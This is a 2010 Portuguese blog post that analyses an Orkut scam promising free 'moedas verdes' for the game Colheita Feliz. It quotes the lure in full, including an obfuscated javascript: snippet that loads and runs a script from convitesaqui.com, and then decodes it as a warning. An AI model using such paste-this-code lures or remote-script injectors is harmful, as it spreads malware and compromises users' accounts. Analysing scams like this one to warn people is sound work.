Thursday, January 7, 2010

Redes sociais e engenharia social... tudo haver...

Recentemente recebi uma mensagem no Orkut dizendo: clique no link para ganhar moedas verdes... Minha primeira questão foi: what a hell são moedas verdes? Com uma consultoria da minha esposa, descobri que há um jogo no Orkut chamado Colheita Feliz, onde as moedas verdes são necessárias para avançar os níveis e adquirir novos itens para melhorar no jogo...


Aproveitando da inocência dos desavisados usuários do Orkut, e a ganância descarada dos usuários destes aplicativos, os oportunistas criminosos virtuais encontraram uma forma bem criativa para difundir malwares e outras pragas..

Bom, a questão é que o link era diferente do JavaScript utilizado nos primórdios do Orkut para abrir as fotos dos álbuns travados. A mensagem é a seguinte:


TUTORIAL COLHEITA FELIZ, PEGUE O TANTO DE MOEDAS QUE QUISER

1) Primeiro, Copie o codigo abaixo que esta escrito emVERDE.


Codigo:



javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp%22+%22://co%22+%22nvi%22+%22tes%22+%22aq%22+%22ui.%22+%22co%22+%22m/Moedas/%22;void(0)






2) Cole o codigo na barra de NAVEGACAO ( onde escreve WWW) e de ENTER.





3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK





4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce.





5) Pronto, agora e so desfrutar de suas MOEDAS VERDES





Quem gostou da um Up por favor ^^


Uma olhada no link e um conhecimento mínimo de ASCII para saber que o código %22 nada mais são que aspas duplas ( " ), então a URL %22ht%22+%22tp%22+%22://co%22+%22nvi%22+%22tes%22+%22aq%22+%22ui.%22+%22co%22+%22m/Moedas/%22, com as aspas concatenadas se transforma em http://convitesaqui.com/Moedas/,

Uma pesquisa no Google revela que este é um "virus" (???) já conhecido: http://info.abril.com.br/noticias/blogs/firewall/seguranca/tome-cuidado-com-a-moeda-verde-no-orkut/


No site HackerNews há um excelente texto sobre o tema (http://www.hackernews.com.br/?p=121), recomendo a leitura para quem procura mais informações sobre este "vírus do orkut"....


Abraços!

1 comment:

fabio said...

é, até mesmo quem nao manja ASCII consegue ver q é um endereço de site, o engraçado é que quando tentamos abrir o site, aparece como se estivesse fora do ar, obs, nao tentei abrir o site no meu pc ^^

fico me perguntando oq esses caras ganham com isso.

Post a Comment